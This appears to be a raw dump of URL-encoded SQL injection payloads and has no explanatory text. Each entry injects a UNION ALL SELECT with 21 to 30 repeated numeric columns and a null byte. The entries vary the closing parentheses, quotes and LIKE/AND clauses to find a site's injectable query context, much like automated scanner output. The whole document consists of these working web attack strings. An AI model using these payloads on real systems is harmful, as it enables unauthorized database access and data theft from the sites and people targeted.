-6173%29%29%20UNION%20ALL%20SELECT%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%2C%201376%00%20AND%20%28%284427%3D4427 -3060%29%29%20UNION%20ALL%20SELECT%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%2C%209526%00%20AND%20%28%288079%3D8079 -3990%29%29%20UNION%20ALL%20SELECT%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%2C%204863%00%20AND%20%28%283324%3D3324 -5003%29%29%20UNION%20ALL%20SELECT%201267%2C%201267%2C%201267%2C%201267%2C%201267%2C%201267%2C%201267%2C%201267%2C%201267%2C%201267%2C%201267%2C%201267%2C%201267%2C%201267%2C%201267%2C%201267%2C%201267%2C%201267%2C%201267%2C%201267%2C%201267%2C%201267%2C%201267%2C%201267%2C%201267%2C%201267%2C%201267%00%20AND%20%28%287560%3D7560 -4950%29%29%20UNION%20ALL%20SELECT%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%2C%202937%00%20AND%20%28%281670%3D1670 -5451%29%29%20UNION%20ALL%20SELECT%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%2C%206605%00%20AND%20%28%288136%3D8136 -7053%29%29%20UNION%20ALL%20SELECT%205133%2C%205133%2C%205133%2C%205133%2C%205133%2C%205133%2C%205133%2C%205133%2C%205133%2C%205133%2C%205133%2C%205133%2C%205133%2C%205133%2C%205133%2C%205133%2C%205133%2C%205133%2C%205133%2C%205133%2C%205133%2C%205133%2C%205133%2C%205133%2C%205133%2C%205133%2C%205133%2C%205133%2C%205133%2C%205133%00%20AND%20%28%284418%3D4418 -2534%29%29%29%20UNION%20ALL%20SELECT%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%2C%201564%00%20AND%20%28%28%285134%3D5134 -5834%29%29%29%20UNION%20ALL%20SELECT%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%00%20AND%20%28%28%286778%3D6778 -6619%29%29%29%20UNION%20ALL%20SELECT%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%2C%203096%00%20AND%20%28%28%284967%3D4967 -4660%29%29%29%20UNION%20ALL%20SELECT%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%2C%202908%00%20AND%20%28%28%286826%3D6826 -7565%29%29%29%20UNION%20ALL%20SELECT%208256%2C%208256%2C%208256%2C%208256%2C%208256%2C%208256%2C%208256%2C%208256%2C%208256%2C%208256%2C%208256%2C%208256%2C%208256%2C%208256%2C%208256%2C%208256%2C%208256%2C%208256%2C%208256%2C%208256%2C%208256%2C%208256%2C%208256%2C%208256%2C%208256%00%20AND%20%28%28%287158%3D7158 -7887%29%29%29%20UNION%20ALL%20SELECT%201842%2C%201842%2C%201842%2C%201842%2C%201842%2C%201842%2C%201842%2C%201842%2C%201842%2C%201842%2C%201842%2C%201842%2C%201842%2C%201842%2C%201842%2C%201842%2C%201842%2C%201842%2C%201842%2C%201842%2C%201842%2C%201842%2C%201842%2C%201842%2C%201842%2C%201842%00%20AND%20%28%28%285153%3D5153 -6517%29%29%29%20UNION%20ALL%20SELECT%209769%2C%209769%2C%209769%2C%209769%2C%209769%2C%209769%2C%209769%2C%209769%2C%209769%2C%209769%2C%209769%2C%209769%2C%209769%2C%209769%2C%209769%2C%209769%2C%209769%2C%209769%2C%209769%2C%209769%2C%209769%2C%209769%2C%209769%2C%209769%2C%209769%2C%209769%2C%209769%00%20AND%20%28%28%286842%3D6842 -9420%29%29%29%20UNION%20ALL%20SELECT%202677%2C%202677%2C%202677%2C%202677%2C%202677%2C%202677%2C%202677%2C%202677%2C%202677%2C%202677%2C%202677%2C%202677%2C%202677%2C%202677%2C%202677%2C%202677%2C%202677%2C%202677%2C%202677%2C%202677%2C%202677%2C%202677%2C%202677%2C%202677%2C%202677%2C%202677%2C%202677%2C%202677%00%20AND%20%28%28%289491%3D9491 -2037%29%29%29%20UNION%20ALL%20SELECT%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%2C%203457%00%20AND%20%28%28%289336%3D9336 -1161%29%29%29%20UNION%20ALL%20SELECT%204336%2C%204336%2C%204336%2C%204336%2C%204336%2C%204336%2C%204336%2C%204336%2C%204336%2C%204336%2C%204336%2C%204336%2C%204336%2C%204336%2C%204336%2C%204336%2C%204336%2C%204336%2C%204336%2C%204336%2C%204336%2C%204336%2C%204336%2C%204336%2C%204336%2C%204336%2C%204336%2C%204336%2C%204336%2C%204336%00%20AND%20%28%28%281207%3D1207 -2969%20UNION%20ALL%20SELECT%207052%2C%207052%2C%207052%2C%207052%2C%207052%2C%207052%2C%207052%2C%207052%2C%207052%2C%207052%2C%207052%2C%207052%2C%207052%2C%207052%2C%207052%2C%207052%2C%207052%2C%207052%2C%207052%2C%207052%2C%207052%00 -9121%20UNION%20ALL%20SELECT%203360%2C%203360%2C%203360%2C%203360%2C%203360%2C%203360%2C%203360%2C%203360%2C%203360%2C%203360%2C%203360%2C%203360%2C%203360%2C%203360%2C%203360%2C%203360%2C%203360%2C%203360%2C%203360%2C%203360%2C%203360%2C%203360%00 -9012%20UNION%20ALL%20SELECT%201177%2C%201177%2C%201177%2C%201177%2C%201177%2C%201177%2C%201177%2C%201177%2C%201177%2C%201177%2C%201177%2C%201177%2C%201177%2C%201177%2C%201177%2C%201177%2C%201177%2C%201177%2C%201177%2C%201177%2C%201177%2C%201177%2C%201177%00 -4543%20UNION%20ALL%20SELECT%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%2C%201137%00 -8126%20UNION%20ALL%20SELECT%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%00 -8882%20UNION%20ALL%20SELECT%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%2C%202881%00 -2203%20UNION%20ALL%20SELECT%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%2C%202563%00 -4902%20UNION%20ALL%20SELECT%205737%2C%205737%2C%205737%2C%205737%2C%205737%2C%205737%2C%205737%2C%205737%2C%205737%2C%205737%2C%205737%2C%205737%2C%205737%2C%205737%2C%205737%2C%205737%2C%205737%2C%205737%2C%205737%2C%205737%2C%205737%2C%205737%2C%205737%2C%205737%2C%205737%2C%205737%2C%205737%2C%205737%00 -3492%20UNION%20ALL%20SELECT%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%00 -1531%20UNION%20ALL%20SELECT%203876%2C%203876%2C%203876%2C%203876%2C%203876%2C%203876%2C%203876%2C%203876%2C%203876%2C%203876%2C%203876%2C%203876%2C%203876%2C%203876%2C%203876%2C%203876%2C%203876%2C%203876%2C%203876%2C%203876%2C%203876%2C%203876%2C%203876%2C%203876%2C%203876%2C%203876%2C%203876%2C%203876%2C%203876%2C%203876%00 -3781%27%29%20UNION%20ALL%20SELECT%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%00%20AND%20%28%27cucL%27%3D%27cucL -5345%27%29%20UNION%20ALL%20SELECT%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%2C%201086%00%20AND%20%28%27Zuyz%27%3D%27Zuyz -4980%27%29%20UNION%20ALL%20SELECT%209028%2C%209028%2C%209028%2C%209028%2C%209028%2C%209028%2C%209028%2C%209028%2C%209028%2C%209028%2C%209028%2C%209028%2C%209028%2C%209028%2C%209028%2C%209028%2C%209028%2C%209028%2C%209028%2C%209028%2C%209028%2C%209028%2C%209028%00%20AND%20%28%27IafD%27%3D%27IafD -5957%27%29%20UNION%20ALL%20SELECT%209012%2C%209012%2C%209012%2C%209012%2C%209012%2C%209012%2C%209012%2C%209012%2C%209012%2C%209012%2C%209012%2C%209012%2C%209012%2C%209012%2C%209012%2C%209012%2C%209012%2C%209012%2C%209012%2C%209012%2C%209012%2C%209012%2C%209012%2C%209012%00%20AND%20%28%27QwAX%27%3D%27QwAX -5037%27%29%20UNION%20ALL%20SELECT%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%2C%207074%00%20AND%20%28%27sfMY%27%3D%27sfMY -2042%27%29%20UNION%20ALL%20SELECT%204730%2C%204730%2C%204730%2C%204730%2C%204730%2C%204730%2C%204730%2C%204730%2C%204730%2C%204730%2C%204730%2C%204730%2C%204730%2C%204730%2C%204730%2C%204730%2C%204730%2C%204730%2C%204730%2C%204730%2C%204730%2C%204730%2C%204730%2C%204730%2C%204730%2C%204730%00%20AND%20%28%27bHqY%27%3D%27bHqY -7252%27%29%20UNION%20ALL%20SELECT%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%2C%203680%00%20AND%20%28%27uvxw%27%3D%27uvxw -7620%27%29%20UNION%20ALL%20SELECT%208616%2C%208616%2C%208616%2C%208616%2C%208616%2C%208616%2C%208616%2C%208616%2C%208616%2C%208616%2C%208616%2C%208616%2C%208616%2C%208616%2C%208616%2C%208616%2C%208616%2C%208616%2C%208616%2C%208616%2C%208616%2C%208616%2C%208616%2C%208616%2C%208616%2C%208616%2C%208616%2C%208616%00%20AND%20%28%27QYtl%27%3D%27QYtl -9029%27%29%20UNION%20ALL%20SELECT%204265%2C%204265%2C%204265%2C%204265%2C%204265%2C%204265%2C%204265%2C%204265%2C%204265%2C%204265%2C%204265%2C%204265%2C%204265%2C%204265%2C%204265%2C%204265%2C%204265%2C%204265%2C%204265%2C%204265%2C%204265%2C%204265%2C%204265%2C%204265%2C%204265%2C%204265%2C%204265%2C%204265%2C%204265%00%20AND%20%28%27Mudq%27%3D%27Mudq -6256%27%29%20UNION%20ALL%20SELECT%207045%2C%207045%2C%207045%2C%207045%2C%207045%2C%207045%2C%207045%2C%207045%2C%207045%2C%207045%2C%207045%2C%207045%2C%207045%2C%207045%2C%207045%2C%207045%2C%207045%2C%207045%2C%207045%2C%207045%2C%207045%2C%207045%2C%207045%2C%207045%2C%207045%2C%207045%2C%207045%2C%207045%2C%207045%2C%207045%00%20AND%20%28%27wRRF%27%3D%27wRRF -9785%27%29%29%20UNION%20ALL%20SELECT%203214%2C%203214%2C%203214%2C%203214%2C%203214%2C%203214%2C%203214%2C%203214%2C%203214%2C%203214%2C%203214%2C%203214%2C%203214%2C%203214%2C%203214%2C%203214%2C%203214%2C%203214%2C%203214%2C%203214%2C%203214%00%20AND%20%28%28%27dPZO%27%3D%27dPZO -8046%27%29%29%20UNION%20ALL%20SELECT%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%2C%207617%00%20AND%20%28%28%27yjNY%27%3D%27yjNY -5393%27%29%29%20UNION%20ALL%20SELECT%205149%2C%205149%2C%205149%2C%205149%2C%205149%2C%205149%2C%205149%2C%205149%2C%205149%2C%205149%2C%205149%2C%205149%2C%205149%2C%205149%2C%205149%2C%205149%2C%205149%2C%205149%2C%205149%2C%205149%2C%205149%2C%205149%2C%205149%00%20AND%20%28%28%27FtMR%27%3D%27FtMR -8543%27%29%29%20UNION%20ALL%20SELECT%202472%2C%202472%2C%202472%2C%202472%2C%202472%2C%202472%2C%202472%2C%202472%2C%202472%2C%202472%2C%202472%2C%202472%2C%202472%2C%202472%2C%202472%2C%202472%2C%202472%2C%202472%2C%202472%2C%202472%2C%202472%2C%202472%2C%202472%2C%202472%00%20AND%20%28%28%27wali%27%3D%27wali -3729%27%29%29%20UNION%20ALL%20SELECT%209881%2C%209881%2C%209881%2C%209881%2C%209881%2C%209881%2C%209881%2C%209881%2C%209881%2C%209881%2C%209881%2C%209881%2C%209881%2C%209881%2C%209881%2C%209881%2C%209881%2C%209881%2C%209881%2C%209881%2C%209881%2C%209881%2C%209881%2C%209881%2C%209881%00%20AND%20%28%28%27EuWq%27%3D%27EuWq -1547%27%29%29%20UNION%20ALL%20SELECT%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%2C%205942%00%20AND%20%28%28%27QnbC%27%3D%27QnbC -6623%27%29%29%20UNION%20ALL%20SELECT%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%2C%208333%00%20AND%20%28%28%27ewgw%27%3D%27ewgw -2229%27%29%29%20UNION%20ALL%20SELECT%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%2C%205224%00%20AND%20%28%28%27Kkut%27%3D%27Kkut -6363%27%29%29%20UNION%20ALL%20SELECT%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%2C%201487%00%20AND%20%28%28%27ElEY%27%3D%27ElEY -2574%27%29%29%20UNION%20ALL%20SELECT%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%2C%202336%00%20AND%20%28%28%27WYnW%27%3D%27WYnW -9025%27%29%29%29%20UNION%20ALL%20SELECT%203377%2C%203377%2C%203377%2C%203377%2C%203377%2C%203377%2C%203377%2C%203377%2C%203377%2C%203377%2C%203377%2C%203377%2C%203377%2C%203377%2C%203377%2C%203377%2C%203377%2C%203377%2C%203377%2C%203377%2C%203377%00%20AND%20%28%28%28%27AoTe%27%3D%27AoTe -8336%27%29%29%29%20UNION%20ALL%20SELECT%208467%2C%208467%2C%208467%2C%208467%2C%208467%2C%208467%2C%208467%2C%208467%2C%208467%2C%208467%2C%208467%2C%208467%2C%208467%2C%208467%2C%208467%2C%208467%2C%208467%2C%208467%2C%208467%2C%208467%2C%208467%2C%208467%00%20AND%20%28%28%28%27oAvO%27%3D%27oAvO -7485%27%29%29%29%20UNION%20ALL%20SELECT%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%2C%204525%00%20AND%20%28%28%28%27Lrdg%27%3D%27Lrdg -3526%27%29%29%29%20UNION%20ALL%20SELECT%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%2C%203510%00%20AND%20%28%28%28%27ryDb%27%3D%27ryDb -1068%27%29%29%29%20UNION%20ALL%20SELECT%204223%2C%204223%2C%204223%2C%204223%2C%204223%2C%204223%2C%204223%2C%204223%2C%204223%2C%204223%2C%204223%2C%204223%2C%204223%2C%204223%2C%204223%2C%204223%2C%204223%2C%204223%2C%204223%2C%204223%2C%204223%2C%204223%2C%204223%2C%204223%2C%204223%00%20AND%20%28%28%28%27MhHw%27%3D%27MhHw -5234%27%29%29%29%20UNION%20ALL%20SELECT%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%2C%206742%00%20AND%20%28%28%28%27mHQt%27%3D%27mHQt -1242%27%29%29%29%20UNION%20ALL%20SELECT%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%2C%209958%00%20AND%20%28%28%28%27aSpv%27%3D%27aSpv -8982%27%29%29%29%20UNION%20ALL%20SELECT%207912%2C%207912%2C%207912%2C%207912%2C%207912%2C%207912%2C%207912%2C%207912%2C%207912%2C%207912%2C%207912%2C%207912%2C%207912%2C%207912%2C%207912%2C%207912%2C%207912%2C%207912%2C%207912%2C%207912%2C%207912%2C%207912%2C%207912%2C%207912%2C%207912%2C%207912%2C%207912%2C%207912%00%20AND%20%28%28%28%27iblE%27%3D%27iblE -6124%27%29%29%29%20UNION%20ALL%20SELECT%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%2C%205900%00%20AND%20%28%28%28%27hgnn%27%3D%27hgnn -7992%27%29%29%29%20UNION%20ALL%20SELECT%206935%2C%206935%2C%206935%2C%206935%2C%206935%2C%206935%2C%206935%2C%206935%2C%206935%2C%206935%2C%206935%2C%206935%2C%206935%2C%206935%2C%206935%2C%206935%2C%206935%2C%206935%2C%206935%2C%206935%2C%206935%2C%206935%2C%206935%2C%206935%2C%206935%2C%206935%2C%206935%2C%206935%2C%206935%2C%206935%00%20AND%20%28%28%28%27VqcP%27%3D%27VqcP -8530%27%20UNION%20ALL%20SELECT%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%2C%206290%00%20AND%20%27paXg%27%3D%27paXg -6562%27%20UNION%20ALL%20SELECT%209254%2C%209254%2C%209254%2C%209254%2C%209254%2C%209254%2C%209254%2C%209254%2C%209254%2C%209254%2C%209254%2C%209254%2C%209254%2C%209254%2C%209254%2C%209254%2C%209254%2C%209254%2C%209254%2C%209254%2C%209254%2C%209254%00%20AND%20%27WGMs%27%3D%27WGMs -8229%27%20UNION%20ALL%20SELECT%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%2C%204544%00%20AND%20%27BwJl%27%3D%27BwJl -2187%27%20UNION%20ALL%20SELECT%206520%2C%206520%2C%206520%2C%206520%2C%206520%2C%206520%2C%206520%2C%206520%2C%206520%2C%206520%2C%206520%2C%206520%2C%206520%2C%206520%2C%206520%2C%206520%2C%206520%2C%206520%2C%206520%2C%206520%2C%206520%2C%206520%2C%206520%2C%206520%00%20AND%20%27AHsU%27%3D%27AHsU -1365%27%20UNION%20ALL%20SELECT%206459%2C%206459%2C%206459%2C%206459%2C%206459%2C%206459%2C%206459%2C%206459%2C%206459%2C%206459%2C%206459%2C%206459%2C%206459%2C%206459%2C%206459%2C%206459%2C%206459%2C%206459%2C%206459%2C%206459%2C%206459%2C%206459%2C%206459%2C%206459%2C%206459%00%20AND%20%27jswm%27%3D%27jswm -3152%27%20UNION%20ALL%20SELECT%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%2C%202521%00%20AND%20%27fMAn%27%3D%27fMAn -1871%27%20UNION%20ALL%20SELECT%201673%2C%201673%2C%201673%2C%201673%2C%201673%2C%201673%2C%201673%2C%201673%2C%201673%2C%201673%2C%201673%2C%201673%2C%201673%2C%201673%2C%201673%2C%201673%2C%201673%2C%201673%2C%201673%2C%201673%2C%201673%2C%201673%2C%201673%2C%201673%2C%201673%2C%201673%2C%201673%00%20AND%20%27KALA%27%3D%27KALA -3996%27%20UNION%20ALL%20SELECT%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%2C%204723%00%20AND%20%27MjvD%27%3D%27MjvD -6640%27%20UNION%20ALL%20SELECT%204807%2C%204807%2C%204807%2C%204807%2C%204807%2C%204807%2C%204807%2C%204807%2C%204807%2C%204807%2C%204807%2C%204807%2C%204807%2C%204807%2C%204807%2C%204807%2C%204807%2C%204807%2C%204807%2C%204807%2C%204807%2C%204807%2C%204807%2C%204807%2C%204807%2C%204807%2C%204807%2C%204807%2C%204807%00%20AND%20%27bvtT%27%3D%27bvtT -4343%27%20UNION%20ALL%20SELECT%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%2C%204875%00%20AND%20%27vtNu%27%3D%27vtNu -3985%27%29%20UNION%20ALL%20SELECT%205667%2C%205667%2C%205667%2C%205667%2C%205667%2C%205667%2C%205667%2C%205667%2C%205667%2C%205667%2C%205667%2C%205667%2C%205667%2C%205667%2C%205667%2C%205667%2C%205667%2C%205667%2C%205667%2C%205667%2C%205667%00%20AND%20%28%27fIbK%27%20LIKE%20%27fIbK -5262%27%29%20UNION%20ALL%20SELECT%206146%2C%206146%2C%206146%2C%206146%2C%206146%2C%206146%2C%206146%2C%206146%2C%206146%2C%206146%2C%206146%2C%206146%2C%206146%2C%206146%2C%206146%2C%206146%2C%206146%2C%206146%2C%206146%2C%206146%2C%206146%2C%206146%00%20AND%20%28%27zOVh%27%20LIKE%20%27zOVh -7101%27%29%20UNION%20ALL%20SELECT%208857%2C%208857%2C%208857%2C%208857%2C%208857%2C%208857%2C%208857%2C%208857%2C%208857%2C%208857%2C%208857%2C%208857%2C%208857%2C%208857%2C%208857%2C%208857%2C%208857%2C%208857%2C%208857%2C%208857%2C%208857%2C%208857%2C%208857%00%20AND%20%28%27mLYl%27%20LIKE%20%27mLYl -3444%27%29%20UNION%20ALL%20SELECT%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%2C%203089%00%20AND%20%28%27gqcj%27%20LIKE%20%27gqcj -6974%27%29%20UNION%20ALL%20SELECT%205541%2C%205541%2C%205541%2C%205541%2C%205541%2C%205541%2C%205541%2C%205541%2C%205541%2C%205541%2C%205541%2C%205541%2C%205541%2C%205541%2C%205541%2C%205541%2C%205541%2C%205541%2C%205541%2C%205541%2C%205541%2C%205541%2C%205541%2C%205541%2C%205541%00%20AND%20%28%27beXp%27%20LIKE%20%27beXp -4432%27%29%20UNION%20ALL%20SELECT%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%2C%201022%00%20AND%20%28%27IPCl%27%20LIKE%20%27IPCl -5638%27%29%20UNION%20ALL%20SELECT%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%2C%205186%00%20AND%20%28%27FHlA%27%20LIKE%20%27FHlA -9731%27%29%20UNION%20ALL%20SELECT%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%2C%207040%00%20AND%20%28%27cnFk%27%20LIKE%20%27cnFk -3125%27%29%20UNION%20ALL%20SELECT%201670%2C%201670%2C%201670%2C%201670%2C%201670%2C%201670%2C%201670%2C%201670%2C%201670%2C%201670%2C%201670%2C%201670%2C%201670%2C%201670%2C%201670%2C%201670%2C%201670%2C%201670%2C%201670%2C%201670%2C%201670%2C%201670%2C%201670%2C%201670%2C%201670%2C%201670%2C%201670%2C%201670%2C%201670%00%20AND%20%28%27XCAp%27%20LIKE%20%27XCAp 